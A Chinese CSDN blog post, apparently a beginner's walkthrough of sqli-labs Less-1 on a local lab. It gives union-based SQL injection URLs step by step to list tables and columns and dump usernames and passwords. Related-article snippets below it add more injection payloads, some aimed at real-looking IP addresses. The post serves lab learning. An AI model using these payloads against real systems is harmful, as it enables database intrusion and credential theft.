萌新学习sql注入0

最新推荐文章于 2024-05-03 21:58:53 发布
最新推荐文章于 2024-05-03 21:58:53 发布
阅读量282 收藏
点赞数
分类专栏: ctf 文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bmth666/article/details/104515318
版权

萌新学习ctf记录,从入门到入土

web学习!!!

sqlilabs第一关

在id后面加 ’ 发现报错,–+不报错,字符型注入
在这里插入图片描述在这里插入图片描述
开始最基础语句 联合查询union select,注意id=-1为一个不存在的值,从1开始依次增加

127.0.0.1/sqlilabs/Less-1/?id=-1' union select 1,2,3,4--+

在这里插入图片描述
发现报错,那么就是3段
在这里插入图片描述
发现2,3有注入点,爆数据了

http://127.0.0.1/sqlilabs/Less-1/?id=-1%27%20union%20select%201,user(),database()--+

在这里插入图片描述
用户为root,数据库为security,然后爆表

http://127.0.0.1/sqlilabs/Less-1/?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20--+

用group_concat函数将相同的行组合起来在这里插入图片描述
爆出来四个表,很明显users使我们需要的,爆列了

127.0.0.1/sqlilabs/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

在这里插入图片描述
发现username和password,最后爆字段了

http://127.0.0.1/sqlilabs/Less-1/?id=-1%27%20union%20select%201,2,group_concat(username,password)%20from%20users--+

在这里插入图片描述
成功爆出所有数据。后来参考了sqlilabs注入类文章发现group_concat(username,0x3a,password)可以这样写的
0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ‘:’ ,用以分割pasword和username。
参考了师傅的文章,第一题也可以用报错注入,参考文章:sqli-lab教程——1-35通关Writeup

附加最近参加的i春秋sql注入的送分题

i春秋sql送分题

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
由于还未入门,只能做做送分题了-v-

Bmth
关注
专栏目录
整理出来的SQL注入点关键字
03-06
整理出来的关于SQL注入时所需要的关键字,很全面,覆盖了很多,包括asp,php等等
SQL注入
qq_46263951的博客
05-14 195
闭合注入 常见的注释符: %23 (#) --+ ;%00 `
SQL注入中,为什么union联合查询,id必须等于0
分享与记录
05-11 1400
?id=0' union select 1,2,3 --+ ?id=0' union select 1,database(),3 --+ ?id=0' union select 1,database(),user() --+ 这里的 id 需要格外注意: 如果只有两个回显位置 那么 id 必须填写一个不存在的数(-1或者0),联合查询才能回显成功 因为在数据表中,id 为 1,2,3,…… 如果参数为: ?id=1' union select 1,2,3 --+ 那么查询语句就是: select *
mysql报错注入
0ffs3t
02-29 1230
mysql报错注入 大家好 我是~  式 QQ:40497992 本人承接任何网站安全检测 指定拿站 网站开发 软件开发 seo 收学员 等其业务 没保存 算了 就是这种 无乱是and 1=1 1=2都是返回正常页面的 盲猪也是没戏的 字段19 网上貌似有介绍都这个注入代码的  但是很多测试都没成功 嘎嘎 这些百度都有
2024年网络安全最新web安全及防护(XSS、CSRF、sql注入)(1)
最新发布
2401_84281594的博客
05-03 2010
几句简单的javascript,获取cookie中的用户名密码,利用jsonp把向1、盗取用户信息,如机器登录帐号、用户网银帐号、各类管理员帐号2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力3、盗窃企业重要的具有商业价值的资料4、非法转账5、强制发送电子邮件7、控制受害者机器向其它网站发起攻击。
sqlilabs中文目录:攻克SQL注入挑战
SQLiLabs是一个针对SQL注入攻击的在线靶场和学习平台,它的课程设计涵盖了从基础到高级的SQL注入技巧。中文目录的发布对于非英语背景的学习者来说是一个福音,因为它将原本英文的挑战性内容进行了本地化,便于理解。...
sql注入学习总结(仅get)
Mikasa
12-21 538
关于sql注入(仅GET)的一些方法总结 这是萌新第一次写博客,难免有些差错,望各位大佬们指点和矫正233 终于辛苦肝完了sqli-labs(27~28左右还是有点不太清楚,为什么我的%a0就不可以啊啊啊啊啊) 好了,进入正题,接下来分享一下我的个人经验(仅仅涉及GET形式且不涉及过滤) 假如我们现在正在做sqli-labs的题(GET形式),那么该如...
CTF Web学习(四)----SQL注入
网络猿的博客
01-11 1573
CTF Web学习(四) SQL注入 CTF Web学习目录链接 CTF Web学习(一):基础篇及头文件修改、隐藏 CTF Web学习(二):代码审计、burp suite应用 CTF Web学习(三):python脚本的编写及应用 文章目录CTF Web学习(四)前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。
i春秋 从0到1CTFer成长之路-CTF中的SQL-1注入
wh1sper、的博客
03-25 1631
这是本萌新第一次写博客,作为对前面的学习的总结。 如有错误,欢迎各位师傅们指正。 如何判断注入类型我就不做过多的解释,不知道同学请移步去学习(手动狗头)。 CTF中的SQL注入 我采用的是手注 根据经验判断是字符型注入。 接下来就来查看有几列,order by后面依次跟1,2,3,4…当到4时页面查询失败,说明有3列。 http://eci-2ze96pvo7epn5uc0i8pa.cloudeci1.ichunqiu.com/index.php?id=1' order by 3 %23 http://
sql 注入 21-30
weixin_62420492的博客
12-26 2402
Less-21
渗透之——SQL注入点检测方法
冰河的专栏
12-09 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84929699 现在有很多防注入程序屏蔽了 and、1=1、1=2 类似这样的关键字,使用这样的方法有时不能探测到注入点了。那么是否有新的方法能够探测注入点呢? 经过一段时间的研究,发现了更好的方法。特此共享一下。 现在假设有一个新闻页面,URL 是 http://192.168...
00注解入门
LuckyMechanic的博客
02-16 147
1、什么是注解(Annotation) 注解还有一个检查的作用 比如我们把toString()中的s改成小写,你看他就报错了
SQL注入步骤
weixin_44689834的博客
05-16 605
SQL注入的过程 最近学习SQL注入,抽空总结一下 1.寻找注入点 找到类似的id=类似的可以手工测试是否为注入点一般的测试手工手段就是 id=1 and 1=2 等等根据返回的页面判断是什么类型的注入方式 一般没有加’‘就是数字型注入 加了’‘就是字符型注入 根据不同的注入类型来选择不同的注入方式 2.判断字段个数 id=1 order by n 3. 判断数据库信息 这个一般是根据页面的报错显示数据库的类型等等 4.查找数据库名 ?id=1 and 1=2 uni
SQL注入漏洞一览
Amire0x的小乐园
10-29 1817
SQL注入漏洞一览 文章篇幅较大,注意适当放松 学习SQL注入之前你需要 理解Web应用的工作原理 任何语言编写的Web应用,有一点是相同的:都具有交互性并且多半是数据库驱动的。它们通常都包含一个后台数据库和很多Web页面,页面中包含了使用某种编程语言编写的服务器端脚本,脚本则能够根据Web页面与用户的交互从数据库中提取特定的信息。 数据库驱动的Web应用通常包含三层:表示层(Web浏览器或呈现引擎),逻辑层(如C#、ASP、NET、PHP、JSP等编程语言)和存储层(如Microsoft SQL Se
SQL注入详解
热门推荐
qq_48904485的博客
03-21 2万+
针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序意料之外结果的攻击行为。 其成因可归结为以下两个原理叠加造成: 1、程序编写者在处理程序和数据库交互时,使用字符串凭借的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 SQL注入的攻击方式分为:报错注入、布尔盲注 、延时注入、堆叠查询、联合查询 、二次注入等等
SQL注入手工检测
zzkkoo8的博客
12-15 1万+
1基本检测 2绕过技巧2017年12月14日 09:36:161、基本检测 数字型 $id=@$_GET['id']; //id未经过滤 $sql = "SELECT * FROM sqltest WHERE id='$id'";判断 asp?id=49' //报错 asp?id=49 and 1=1 asp?id=49 and 1=2判断什么型 ?id=1%2b1 //加法减法,可区分数字
SQL注入 (1)
qq_39527920的博客
08-12 1244
第一步:测试是否存在注入点,用and语句测试。 http://120.203.13.75:6815/?id=1 and 1=1  http://120.203.13.75:6815/?id=1 and 1=2 一网址可以正常显示,二网址则无法显示,所以推断有注入点。 第二步:猜测字段 http://120.203.13.75:6815/?id=1 order by 2 http:...
《WEB安全渗透测试》(11)SQL注入的绕过
午夜安全
10-24 1323
《WEB安全渗透测试》(11)SQL注入的绕过 当我们访问如下URL的时候,提示“存在非法字符”:http://www.tianchi.com/web/rg/1.php?id=1 order by 3可以尝试Order,同理如果其他字符必拦截,也可以大小写混合。当我们遇到关键字必过滤的时候,如我们访问如下URL:http://www.tianchi.com/web/rg/1.php?id=1 order by 3...
SQL注入学习指南:Sqli-labs实战教程
"《SQL注入天书》是一本由Lcamry编写的关于MySQL注入技术的学习指南,发布于2016年7月。该文档旨在帮助读者深入了解SQL注入原理、实战技巧以及渗透测试中的相关知识。SQL注入是一种常见的网络安全漏洞,黑客通过构造...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值